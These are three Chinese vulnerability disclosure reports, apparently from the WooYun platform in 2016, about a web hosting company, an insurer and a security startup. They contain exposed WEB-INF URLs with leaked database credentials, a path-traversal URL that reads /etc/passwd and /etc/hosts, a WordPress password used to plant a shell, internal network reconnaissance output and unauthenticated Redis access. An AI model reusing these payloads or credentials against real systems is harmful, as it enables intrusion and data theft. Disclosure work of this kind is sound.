漏洞详情 披露状态： 2016-05-10： 细节已通知厂商并且等待厂商处理中 2016-05-10： 厂商已经确认，细节仅向厂商公开 2016-05-20： 细节向核心白帽子及相关领域专家公开 2016-05-30： 细节向普通白帽子公开 2016-06-09： 细节向实习白帽子公开 2016-06-24： 细节向公众公开 简要描述： 敏感信息泄露 详细说明： 关于WEB-INFWEB-INF是Java的WEB应用的安全目录。所谓安全就是客户端无法访问，只有服务端可以访问的目录。 WEB-INF目录下的敏感目录及文件： titlees目录（包含该应用核心的java类编译后的title文件及部分配置文件） lib目录（所用框架、插件或组件的架包） web.xml（重要的配置文件） ： 1、漏洞触发页面以及对应功能: http://www.xinnet.com/WEB-INF/titlees/modules/spring.xml http://www.xinnet.com/WEB-INF/web.xml 2、漏洞复现具体流程，包含具体payload和完整的数据包： 数据库配置文件： 核心数据库账号泄露，公网ip，貌似不能外联。。。。。。 code 区域#jdbc.driverClassName=com.mysql.jdbc.Driver #jdbc.url=jdbc:mysql://172.20.16.200:3306/info_pub #jdbc.username=gao #jdbc.password=gao jdbc.driverClassName=oracle.jdbc.driver.OracleDriver jdbc.url=jdbc:oracle:thin:@172.20.20.231:1521:xinnetdb jdbc.username=xinnet jdbc.password=xinnet123 #jdbc.driverClassName=oracle.jdbc.driver.OracleDriver #jdbc.url=jdbc:oracle:thin:@172.20.21.2:1521:xinnet2 #jdbc.username=xinnet #jdbc.password=xinnet 核心数据库： code 区域xinnetsql.password=g5F6JM4syneJtkAmFUC5gw== 漏洞证明： 泄露的配置文件如下: code 区域xinnetsql.password=g5F6JM4syneJtkAmFUC5gw== 修复方案： 配置加固 版权声明：转载请注明来源 D＆G@乌云 漏洞回应 厂商回应： 危害等级：高 漏洞Rank：10 确认时间：2016-05-10 13:59 厂商回复： 已经转给新网数码的人员进行处理。 最新状态： 暂无

漏洞详情披露状态： 2016-05-26： 细节已通知厂商并且等待厂商处理中2016-05-26： 厂商已经确认，细节仅向厂商公开2016-05-26： 厂商已经修复漏洞并主动公开，细节向公众公开简要描述：国华人寿保险股份有限公司某站存在任意文件读取漏洞详细说明：http://proposal.guohualife.com:8091/proposalproxy/plan/download/20150411100453.pdf?filename=../../../../../../../../../../etc/passwdcode 区域root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin weblogic:x:500:500::/home/weblogic:/bin/bashhttp://proposal.guohualife.com:8091/proposalproxy/plan/download/20150411100453.pdf?filename=../../../../../../../../../../etc/hostscode 区域# Do not remove the following line, or various programs # that require network functionality will fail. 127.0.0.1 localhost.localdomain localhost ::1 localhost6.localdomain6 localhost6 10.32.66.38 10_32_66_38.localdomain localhost漏洞证明： code 区域http://proposal.guohualife.com:8091/proposalproxy/plan/download/20150411100453.pdf?filename=../../../../../../../../../../etc/passwd 修复方案： 版权声明：转载请注明来源 0x 80@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：2确认时间：2016-05-26 10:36厂商回复：此为测试环境，已经关闭；最新状态：2016-05-26：测试环境，已经关闭

漏洞详情披露状态： 2016-05-04： 细节已通知厂商并且等待厂商处理中2016-05-04： 厂商已经确认，细节仅向厂商公开2016-05-14： 细节向核心白帽子及相关领域专家公开2016-05-24： 细节向普通白帽子公开2016-06-03： 细节向实习白帽子公开2016-06-18： 细节向公众公开简要描述：臻至科技是一个专注于独立第三方的数据安全团队，现已获得著名投资方投资。目前成员大多是来自于世界500强和纳斯达克上市的知名企业，我们年轻，不安于现状，想做一些多年后值得回忆、能和别人“吹牛海侃”的事情。年轻，不仅指我们的年龄，还指我们所做的领域。详细说明：臻至科技安全团队招人吧~1、http://blog.zenzet.com:8010/wordpress/blog 123456789a可以直接根据 plugins 插件写shell内网：code 区域/>uname -a Linux ubuntu-14-04-3 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux />ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:02:1a:20 inet addr:192.168.10.161 Bcast:192.168.10.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe02:1a20/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:285900085 errors:0 dropped:137967 overruns:0 frame:0 TX packets:268148077 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:38541408148 (38.5 GB) TX bytes:53052633261 (53.0 GB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:610735383 errors:0 dropped:0 overruns:0 frame:0 TX packets:610735383 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:52625363320 (52.6 GB) TX bytes:52625363320 (52.6 GB) />arp -a ? (192.168.10.32) at 94:eb:cd:53:d7:bd [ether] on eth0 zenzet (192.168.10.39) at a0:99:9b:04:8e:53 [ether] on eth0 ? (192.168.10.79) at 6c:40:08:bf:c4:e8 [ether] on eth0 ? (192.168.10.182) at 00:0c:29:a0:1e:8b [ether] on eth0 zpf (192.168.10.33) at a4:5e:60:f3:16:61 [ether] on eth0 Rongde-iPhone (192.168.10.40) at 60:92:17:88:0d:b2 [ether] on eth0 ? (192.168.10.66) at a4:5e:60:ef:f6:11 [ether] on eth0 ? (192.168.10.22) at ec:55:f9:69:8d:33 [ether] on eth0 ? (192.168.10.29) at 1c:5c:f2:b8:31:f7 [ether] on eth0 ? (192.168.10.176) at 00:0c:29:bc:df:2d [ether] on eth0 ? (192.168.10.198) at 00:0c:29:d7:43:04 [ether] on eth0 ? (192.168.10.96) at 78:f5:fd:6c:a6:7a [ether] on eth0 ? (192.168.10.85) at 70:3e:ac:ed:e2:d0 [ether] on eth0 android-3313730458e50d0a (192.168.10.34) at ac:cf:85:ca:af:73 [ether] on eth0 ? (192.168.10.246) at dc:53:60:6f:04:64 [ether] on eth0 ? (192.168.10.41) at 60:92:17:88:0d:b2 [ether] on eth0 ? (192.168.10.67) at fc:3d:93:16:b0:d7 [ether] on eth0 ? (192.168.10.30) at a4:5e:60:ef:f6:11 [ether] on eth0 ? (192.168.10.166) at 00:0c:29:cf:ff:78 [ether] on eth0 DESKTOP-L19Q5EU (192.168.10.97) at dc:53:60:6f:04:64 [ether] on eth0 ? (192.168.10.199) at 00:0c:29:bc:5f:3f [ether] on eth0 ? (192.168.10.53) at b8:e8:56:34:ec:ba [ether] on eth0 Janky (192.168.10.35) at b8:e8:56:34:ec:ba [ether] on eth0 ? (192.168.10.42) at ac:bc:32:89:32:63 [ether] on eth0 xuzhens-iPhone (192.168.10.93) at f4:31:c3:61:5a:c9 [ether] on eth0 android-c2dde5ee21615c29 (192.168.10.68) at f0:25:b7:80:aa:17 [ether] on eth0 ? (192.168.10.24) at 48:6b:2c:a6:ae:eb [ether] on eth0 ? (192.168.10.178) at <incomplete> on eth0 JeffinBaos-Air (192.168.10.6) at 2c:f0:ee:07:40:ee [ether] on eth0 xiaogeer (192.168.10.31) at 80:ea:96:4a:5d:9d [ether] on eth0 ? (192.168.10.98) at ac:cf:85:ca:af:73 [ether] on eth0 ? (192.168.10.61) at a4:5e:60:c0:fe:0f [ether] on eth0 ? (192.168.10.36) at a4:5e:60:f3:16:61 [ether] on eth0 Cc-2 (192.168.10.94) at 6c:40:08:bf:c4:e8 [ether] on eth0 ? (192.168.10.43) at b8:e8:56:34:ec:ba [ether] on eth0 ? (192.168.10.99) at 78:92:9c:7e:54:3e [ether] on eth0 wangziruideMBP (192.168.10.37) at 6c:40:08:a9:72:2e [ether] on eth0 caolinjdeiPhone (192.168.10.44) at 70:48:0f:44:11:98 [ether] on eth0 suxiaobgandeAir (192.168.10.70) at a4:d1:8c:f1:4c:f2 [ether] on eth0 ? (192.168.10.95) at fc:3d:93:16:b0:d7 [ether] on eth0 router.asus.com (192.168.10.1) at c4:04:15:25:31:48 [ether] on eth0 heysbkukanzheli (192.168.10.100) at fc:e9:98:7c:2f:ba [ether] on eth0 ? (192.168.10.82) at 6c:40:08:a9:72:2e [ether] on eth0 ? (192.168.10.63) at 60:c5:47:05:b7:3e [ether] on eth0 ? (192.168.10.71) at 2c:d0:5a:b1:6c:d3 [ether] on eth0 ? (192.168.10.2) at c4:04:15:25:31:48 [ether] on eth0 ? (192.168.10.196) at 00:0c:29:10:7b:08 [ether] on eth02、Redis未授权访问115.29.203.54:6379115.29.203.54:7000115.29.203.54:6789code 区域Connected. 115.29.203.54:0>info # Server redis_version:2.8.17 redis_git_sha1:00000000 redis_git_dirty:0 redis_build_id:899a50dd343b0f96 redis_mode:standalone os:Linux 2.6.32-358.6.2.el6.x86_64 x86_64 arch_bits:64 multiplexing_api:epoll gcc_version:4.4.7 process_id:20493 run_id:29a859ecf22adfa374f77a992289339978377132 tcp_port:6379 uptime_in_seconds:35225407 uptime_in_days:407 hz:10 lru_clock:2710515 config_file: # Clients connected_clients:13 client_longest_output_list:0 client_biggest_input_buf:0 blocked_clients:0 # Memory used_memory:1067992 used_memory_human:1.02M used_memory_rss:7475200 used_memory_peak:1117904 used_memory_peak_human:1.07M used_memory_lua:33792 mem_fragmentation_ratio:7.00 mem_allocator:jemalloc-3.6.0 # Persistence loading:0 rdb_changes_since_last_save:4 rdb_bgsave_in_progress:0 rdb_last_save_time:1449471155 rdb_last_bgsave_status:err rdb_last_bgsave_time_sec:0 rdb_current_bgsave_time_sec:-1 aof_enabled:0 aof_rewrite_in_progress:0 aof_rewrite_scheduled:0 aof_last_rewrite_time_sec:-1 aof_current_rewrite_time_sec:-1 aof_last_bgrewrite_status:ok aof_last_write_status:ok # Stats total_connections_received:4169 total_commands_processed:21271 instantaneous_ops_per_sec:0 rejected_connections:0 sync_full:0 sync_partial_ok:0 sync_partial_err:0 expired_keys:4785 evicted_keys:0 keyspace_hits:5340 keyspace_misses:156 pubsub_channels:0 pubsub_patterns:0 latest_fork_usec:291 # Replication role:master connected_slaves:0 master_repl_offset:0 repl_backlog_active:0 repl_backlog_size:1048576 repl_backlog_first_byte_offset:0 repl_backlog_histlen:0 # CPU used_cpu_sys:13952.89 used_cpu_user:9476.04 used_cpu_sys_children:2241.05 used_cpu_user_children:175.00 # Keyspace db0:keys=1,expires=0,avg_ttl=0 115.29.203.54:0>keys * crackit貌似被人撸了 赶紧查查3、gitlabhttp://git.zenzet.com/ 可以http://git.zenzet.com/explore 直接看所有项目4、Mailok其他的code 区域blog.zenzet.com:122.234.56.66 sso.zenzet.com:121.40.222.125 smtp.zenzet.com:42.120.219.29 ftp.zenzet.com:192.168.10.168 dev.zenzet.com:115.29.203.54 monitor.zenzet.com:121.40.222.125 m.zenzet.com:42.121.103.112 wiki.zenzet.com:115.29.203.54 jobs.zenzet.com:120.55.249.149 pop3.zenzet.com:42.120.219.25 reg.zenzet.com:192.168.10.188 developer.zenzet.com:120.55.196.208 cas.zenzet.com:121.40.222.125 imap.zenzet.com:42.120.219.28 bi.zenzet.com:192.168.10.166 seo.zenzet.com:122.234.56.66 jira.zenzet.com:115.29.203.54 mail.zenzet.com:42.156.140.99 vm.zenzet.com:122.234.56.66 nexus.zenzet.com:192.168.10.188 git.zenzet.com:120.26.71.228 solr.zenzet.com:122.234.56.66 console.zenzet.com:120.55.199.46 review.zenzet.com:115.29.203.54 jump.zenzet.com:122.234.56.66 zk.zenzet.com:122.234.56.66 openapi.zenzet.com:120.55.139.31 jenkins.zenzet.com:192.168.10.188 http://review.zenzet.com/admin/login-default.do http://115.29.203.54:8060/login http://115.29.203.54:8090/forgotuserpassword.action http://jira.zenzet.com/secure/Dashboard.jspa等等。。。 不在测试 ok 就这样漏洞证明：···修复方案：努力加强安全版权声明：转载请注明来源 爱上平顶山@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-05-04 17:59厂商回复：[email protected]/* */对我公司的关注与支持，收到提示后我们立刻进行确认和响应，对问题逐一进行排查，现已将发现的漏洞修复，修复情况通报如下：ess 弱密码被破解决方案：已使用强密码替换。ess 插件被利用解决方案：禁用不必要插件，规范第三方组件的使用，并在以后加强对第三方产品的审核、验证。未加安全访问限制解决方案： 该 Redis 实为废弃数据库，已在2015年初停止使用，现已彻底下线。以后必将及时下线历史废弃服务。公开项目可被外部直接访问解决方案：加强内部开发人员权限控制和安全培训，禁止建立公开项目5.员工测试邮箱账户通过公开项目泄露解决方案： 加强内部开发人员权限控制和安全培训，禁止使用个人邮箱进行开发测试作为一家初创企业, 此次事件暴露公司在内部管理方面存在不足，尤其是在新员工内部账户管理培训衔接上存在问题。团队相关负责人和事故责任人晚上睡不好觉了，因为负责人明天例会时得给大家做检讨，老板要求他做到漏洞问题讲解到市场部和行政部的同事也能听懂。并且，后续公司在加强管理和严格执行制度流程方面，这次事件要作为案例了。最新状态：2016-05-04：补充未显示部分 1.WordPress 弱密码被破 2.WordPress 插件被利用 3.Redis 未加安全访问限制 4.GitLab 公开项目可被外部直接访问